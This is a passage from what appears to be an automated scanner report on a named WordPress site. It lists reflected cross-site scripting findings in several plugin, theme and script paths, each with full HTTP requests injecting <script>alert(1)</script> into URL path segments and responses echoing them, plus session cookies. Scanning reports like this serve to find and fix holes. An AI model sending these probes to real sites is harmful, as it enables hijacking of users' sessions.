Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins1dbff<script>alert(1)</script>b6d08d9390f/wp-polls/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.64. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 50078<script>alert(1)</script>a48f2ebca3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls50078<script>alert(1)</script>a48f2ebca3f/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:35 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls50078<script>alert(1)</script>a48f2ebca3f/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.65. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 62b86<script>alert(1)</script>6e2a650f32b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-js.js62b86<script>alert(1)</script>6e2a650f32b?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:12 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js62b86<script>alert(1)</script>6e2a650f32b?ver=2.50 </strong>
...[SNIP]...

2.66. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20a8<script>alert(1)</script>bfb31b38a15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contenta20a8<script>alert(1)</script>bfb31b38a15/plugins/wp-postratings/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:55 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-contenta20a8<script>alert(1)</script>bfb31b38a15/plugins/wp-postratings/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.67. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f789e<script>alert(1)</script>f2acdbcfeda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf789e<script>alert(1)</script>f2acdbcfeda/wp-postratings/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:13 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/pluginsf789e<script>alert(1)</script>f2acdbcfeda/wp-postratings/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.68. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9dfa9<script>alert(1)</script>8fc76e0ba66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-postratings9dfa9<script>alert(1)</script>8fc76e0ba66/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:46 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-postratings9dfa9<script>alert(1)</script>8fc76e0ba66/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.69. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5920<script>alert(1)</script>3a1fd1c46c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-postratings/postratings-js.jsd5920<script>alert(1)</script>3a1fd1c46c0?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:11 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.jsd5920<script>alert(1)</script>3a1fd1c46c0?ver=1.50 </strong>
...[SNIP]...

2.70. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89904<script>alert(1)</script>cf6980bae05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content89904<script>alert(1)</script>cf6980bae05/themes/AndroidTappv3/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:40 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:40 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:40 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: dd4e1e5189f7d24b8a1efc32236f52a6
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content89904<script>alert(1)</script>cf6980bae05/themes/AndroidTappv3/favicon.ico </strong>
...[SNIP]...

2.71. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 683ba<script>alert(1)</script>21824087c86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes683ba<script>alert(1)</script>21824087c86/AndroidTappv3/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:59 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:59 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:59 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 36dd09b715c1eefd82c01bd628567586
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes683ba<script>alert(1)</script>21824087c86/AndroidTappv3/favicon.ico </strong>
...[SNIP]...

2.72. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c5114<script>alert(1)</script>a047f7fb5cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/AndroidTappv3c5114<script>alert(1)</script>a047f7fb5cd/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:17:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:17:28 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:17:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 7c49d5b1c78130d3483e8bbf6f032964
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes/AndroidTappv3c5114<script>alert(1)</script>a047f7fb5cd/favicon.ico </strong>
...[SNIP]...

2.73. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ad5e3<script>alert(1)</script>34d787bfa65 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/AndroidTappv3/favicon.icoad5e3<script>alert(1)</script>34d787bfa65 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:17:39 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:17:39 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:17:39 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 30ab6cbf9904a435a453766c8d6230bb
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.icoad5e3<script>alert(1)</script>34d787bfa65 </strong>
...[SNIP]...

2.74. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload de962<script>alert(1)</script>2c358430fe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesde962<script>alert(1)</script>2c358430fe4/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:39 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includesde962<script>alert(1)</script>2c358430fe4/js/jquery/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.75. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11d62<script>alert(1)</script>38a46498964 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js11d62<script>alert(1)</script>38a46498964/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:56 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js11d62<script>alert(1)</script>38a46498964/jquery/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.76. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d4bf8<script>alert(1)</script>90010bbd65f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryd4bf8<script>alert(1)</script>90010bbd65f/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:18 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
